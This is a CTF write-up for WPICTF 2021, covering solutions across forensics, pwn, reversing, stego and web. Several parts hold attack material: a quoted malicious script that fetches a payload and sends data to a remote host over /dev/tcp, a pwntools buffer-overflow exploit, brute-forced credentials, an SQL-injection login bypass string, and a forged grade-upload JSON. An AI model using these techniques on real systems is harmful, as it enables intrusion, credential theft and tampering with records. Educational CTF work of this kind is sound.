WPICTF 2021
forensics
DFIR
Solved by : thewhiteh4t
- we get a
.ova
file for this one - challenge states that activity was detected in / directory
- in / directory we can see a
.pot
file
- this file contains :
$6$fZ/iAgR.$FHl9m/ibTVBQ3OQ645IiLtrcxSsxdt8pTQHh7knfQ2GhD7Pbu0Dv0evXaGnnMVjV7xe5KlRprL5hWEjE6/Ruj0:toor
- looks like shadow file format so i tried to login as
root
withtoor
as password and it works! - in
/root
we can see some interesting dot files
payload.sh
pulls an encrypted csv file from gitlab and decrypts it
#!/bin/bash
W=$((15*60))
K=120
while true
do
echo "sleeping for $W seconds"
sleep $W
rm .encrypted_csv.data
wget https://gitlab.com/thehacker1/payload/-/raw/master/.encrypted_csv.data
echo "downloaded file"
F="./.encrypted_csv.data"
hexdump -v -e '/1 "%u\n"' $F | while read B; do
E=$((K^B))
C=$(printf \\$(printf '%03o' $E))
echo -n $C >> encrypted.csv
done
echo "decrypted newest command"
S=$(cat encrypted.csv)
rm encrypted.csv
S="${S::-1}"
D=,
S=$S$D
array=();
while [[ $S ]]; do
array+=( "${S%%"$D"*}" );
S=${S#*"$D"};
done;
declare -a array
M=${array[0]}
I=${array[1]}
P=${array[2]}
M=${M##WPI}
echo "routing message to $I:$P"
echo "$M" > /dev/tcp/$I/$P
done
- I modified the script to not remove the new file by commenting out line 19
encrypted.csv
holds our flag!
Holmes:
Solved by : Starry-Lord
- the challenge gives us the following string
Z29vZCB0aG91Z2h0LCBidXQgbm8u
- it looks base64 , however base64 decoder shows the following:
good thought, but no.
- using
Sherlock
OSINT tool we found this github repository :
https://github.com/Z29vZCB0aG91Z2h0LCBidXQgbm8u/flag/blob/main/README.md
WPI{sh3rlock_holmes_w0uld_be_pr0ud}
misc
Pokemon
solved by : chronocruz.exe
- Using gbgw64 Gameboy emulator
- Load up the provided pokemon ROM
- Start the game
- Continue to tall grasses towards north after exiting your house
- Professor Oak will stop you saying its dangerous to go without a pokemon
- Then he will take you to his lab and give a choice between three pokeballs
- Left most = Charmander
- Middle = Squirtle
- Right most = Bulbasaur
- (Not that these choices matter anyway)
-
Soon as you pick your pokemon your rival will choose his pokeball and no matter which one he choses he will get a Mewtwo, which is basically the strongest pokemon in this game. And it is level 50 to further salt your wounds.
- Simple way to win, find the cheat menu within your gameboy emulator
- (In gbgw64 you just right click and there it is)
- Add the following codes
- 01FF16D0 - Unlimited HP so you don’t die
- 0170E9CF - Enemy can’t attack and is hurt every turn with a burn status effect
- Patiently keep attacking your enemy till his health drops to zero and you get the following screen.
- Congratulations, you’re the best pokemon trainer (not really).
Cast_Away
solved by : chronocruz.exe
- We are provided with Minecraft world data.
- Extract the files and now we need a tool called the NBT Explorer which can be used to read Minecraft’s proprietary Named Binary Tag (NBT) file format.
- Now the description says three players ran off with the flag.
-
So the flag must be split between the three players.
- Opening the first file in playerdata folder we get
- Further expanding and studying the tree we find
-
The value of EnderItems > tag > display > Name seems to be the end part of a flag. Note this value down.
-
Repeating the process for the next playerdata file
-
This time we find a flag like string in Inventory > tag > pages
-
For the third playerdata however :
- There was no relevant information directly visible in the data.
- Looking at the coordinates of the player we find
- Using the Search > Chunk Finder function
-
We input X and Z coordinates but I was unable to find the exact chunk/block values.
-
Moving onto a second tool called Universal Minecraft Editor which a wonderful tool available for free at https://www.universalminecrafteditor.com/
- We load the minecraft world data into this tool and using the chunk locator input X and Z coordinates
- We see there is a sign post within the chunk we located.
- Opening this chunk reveals the in-game objects within this region and their attributes
- We clearly see the value of Text2 looks like the beginning of our string
- Concatenating the three parts we get the full string that is our flag
WPI{zaQa4ttIyNo}
pwn
$m4$h
Solved by : thewhiteh4t
#!/usr/bin/env python3
from pwn import *
host = 'smash184384.wpictf.xyz'
port = 15724
junk = 'A' * 11
num = 923992130
le_num = p32(num, endianness='little')
buffer = junk.encode() + le_num + '\n'.encode()
conn = remote(host, port)
conn.send(buffer)
flag = conn.recvline().decode().split(': ')[1].strip()
print(f'\nFLAG : {flag}\n')
conn.close()
re
Baby’s First Reversing
Solved By : thewhiteh4t
- we have a python bytecode file
- we can de-compile it using
uncompyle6
- here is the resultant python script
def __main__(inp):
i = -4
for c in inp:
if i == 4:
if c != ' ':
exit(82)
else:
if i == -4:
if c != 'W':
exit(133)
else:
if i == -2:
if c != 'I':
exit(42069)
elif i == -1 and c != '{':
exit(11037)
if i == 10:
if c != '}':
exit(9001)
else:
if i == 1:
if c != '@':
exit(11037)
if i == 2 and c != '5':
exit(11037)
if i == 7 and c != 'P':
exit(11037)
if i == 3:
if c != 'E':
exit(11037)
else:
if i == 0:
if c != 'h':
exit(82)
if i == 5 and c != 'h':
exit(11037)
if i == -3 and c != 'P':
exit(133)
if i == 9:
if c != '!':
exit(133)
else:
if i == 6:
if c != '0':
exit(133)
if i == 8 and c != '3':
exit(133)
i += 1
else:
print(':)')
__main__(input('hi'))
- if we carefully observe we can see a pattern
- it is checking the value of
i
andc
- if the condition is not satisfied program exits with an exit code
if i == -4:
if c != 'W':
exit(133)
- if we look at the values of i and c we can see another pattern
i == -4 -> c = W
i == -3 -> c = P
i == -2 -> c = I
i == -1 -> c = {
i == 0 -> c = h
i == 1 -> c = @
i == 2 -> c = 5
i == 3 -> c = E
i == 4 -> c = SPACE
i == 5 -> c = h
i == 6 -> c = 0
i == 7 -> c = P
i == 8 -> c = 3
i == 9 -> c = !
i == 10 -> c = }
WPI{h@5E h0P3!}
stego
Glute
Solved by : Ava
- we have a PNG image
- running
foremost
reveals a JPG and PDF files inside it
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File
Foremost started at Sat Apr 24 21:28:46 2021
Invocation: foremost glute.png
Output directory: /home/twh/ctf/wpictf/glute/output
Configuration file: /etc/foremost.conf
------------------------------------------------------------------
File: glute.png
Start: Sat Apr 24 21:28:46 2021
Length: 335 KB (343136 bytes)
Num Name (bs=512) Size File Offset Comment
0: 00000564.jpg 19 KB 288793
1: 00000000.png 335 KB 0 (699 x 699)
2: 00000557.pdf 55 KB 285674
Finish: Sat Apr 24 21:28:46 2021
3 FILES EXTRACTED
jpg:= 1
png:= 1
pdf:= 1
------------------------------------------------------------------
- PDF contains our flag
WPI{P0lyGlOtz_R_koo1}
Suspicious traffic
Solved by : thewhiteh4t
- we are given a pcapng file with some HTTP traffic
- some of the requests have extra characters in data field
- they can be listed using tshark easily
tshark -r capture.pcapng -T fields -e http.file_data | grep "\S" | grep -v "html" | cut -d "\\" -f 1 | tr -d "\n"
WPI{su3p1ci0uS_htTp}
web
wpi admin
Solved by : thewhiteh4t
- email of our friend : alexo@uupeye.edu
- “students” here have some “bad” passwords
- emails of students are visible on : https://wpiadmin.wpictf.xyz/topStudents
- so we get a list of emails which we can bruteforce on student login!
colino@uupeye.edu
calliep@uupeye.edu
annar@uupeye.edu
gaylenek@uupeye.edu
dennisb@uupeye.edu
sherrim@uupeye.edu
adams@uupeye.edu
- after bruteforcing we get all these credentials
colino@uupeye.edu:123456
calliep@uupeye.edu:password
annar@uupeye.edu:iloveyou
gaylenek@uupeye.edu:qwerty
dennisb@uupeye.edu:123123
sherrim@uupeye.edu:12345678
adams@uupeye.edu:soccer
- after checking each profile we get flag on
dennisb@uupeye.edu
wpi admin 2
Solved by : thewhiteh4t
- we login as dennisb@uupeye.edu again
- In student communication we get the link to admin portal : https://wpiadmin.wpictf.xyz/iyghfihGBKHJF9719fn113
- Bruteforcing did not work so I tried SQL login bypass using burpsuite
admin@uupeye.edu' or '1'='1
- Bypass is successful and we get the link for admin portal!
wpi admin 3
Solved by : thewhiteh4t
- We now have access to admin panel and we have to change grades of our friend
- challenge states that we need to add grades for 4 semesters
- grades are uploaded using a json file
- on inspecting the page source we can see a link for an example json file
- by adding two more semesters and changing
production
to true we can upload grades successfully, here is the json I used :
{
"configName": "Example",
"timezone": "EST",
"production": true,
"studentData": [
{
"name": "Alexo O",
"email": "alexo@uupeye.edu",
"id": 123456,
"major": "Computer Science",
"class": 2023,
"workerStatus": false,
"grades": [
{
"year": 2019,
"semester": "fall",
"semesterGPA": 4.00,
"courses": [
{
"name": "Calculus 1",
"code": "MA1021",
"points": 3,
"grade": "A"
},
{
"name": "Introduction to Program Design",
"code": "CS1101",
"points": 3,
"grade": "A"
},
{
"name": "Elements of Writing",
"code": "WR1010",
"points": 3,
"grade": "A"
}, {
"name": "Calculus 2",
"code": "MA1022",
"points": 3,
"grade": "A"
},
{
"name": "Accelerated Object-Oriented Design Concepts",
"code": "CS2103",
"points": 3,
"grade": "A"
},
{
"name": "Writing about Science and Technology",
"code": "WR1011",
"points": 3,
"grade": "A"
}
]
},
{
"year": 2019,
"semester": "spring",
"semesterGPA": 4.00,
"courses": [
{
"name": "Calculus 3",
"code": "MA1023",
"points": 3,
"grade": "A"
},
{
"name": "Calculus 4",
"code": "MA1024",
"points": 3,
"grade": "A"
},
{
"name": "Systems Programming Concepts",
"code": "CS2303",
"points": 3,
"grade": "A"
},
{
"name": "Algorithms",
"code": "CS2223",
"points": 3,
"grade": "A"
},
{
"name": "General Physics-mechanics",
"code": "PH1110",
"points": 3,
"grade": "A"
},
{
"name": "General Physics-electricity and Magnetism",
"code": "PH1120",
"points": 3,
"grade": "A"
}
]
},
{
"year": 2020,
"semester": "spring",
"semesterGPA": 4.00,
"courses": [
{
"name": "Calculus 3",
"code": "MA1023",
"points": 3,
"grade": "A"
},
{
"name": "Calculus 4",
"code": "MA1024",
"points": 3,
"grade": "A"
},
{
"name": "Systems Programming Concepts",
"code": "CS2303",
"points": 3,
"grade": "A"
},
{
"name": "Algorithms",
"code": "CS2223",
"points": 3,
"grade": "A"
},
{
"name": "General Physics-mechanics",
"code": "PH1110",
"points": 3,
"grade": "A"
},
{
"name": "General Physics-electricity and Magnetism",
"code": "PH1120",
"points": 3,
"grade": "A"
}
]
},
{
"year": 2020,
"semester": "summer",
"semesterGPA": 4.00,
"courses": [
{
"name": "Calculus 3",
"code": "MA1023",
"points": 3,
"grade": "A"
},
{
"name": "Calculus 4",
"code": "MA1024",
"points": 3,
"grade": "A"
},
{
"name": "Systems Programming Concepts",
"code": "CS2303",
"points": 3,
"grade": "A"
},
{
"name": "Algorithms",
"code": "CS2223",
"points": 3,
"grade": "A"
},
{
"name": "General Physics-mechanics",
"code": "PH1110",
"points": 3,
"grade": "A"
},
{
"name": "General Physics-electricity and Magnetism",
"code": "PH1120",
"points": 3,
"grade": "A"
}
]
}
]
}
]
}
- after uploading it we get the flag!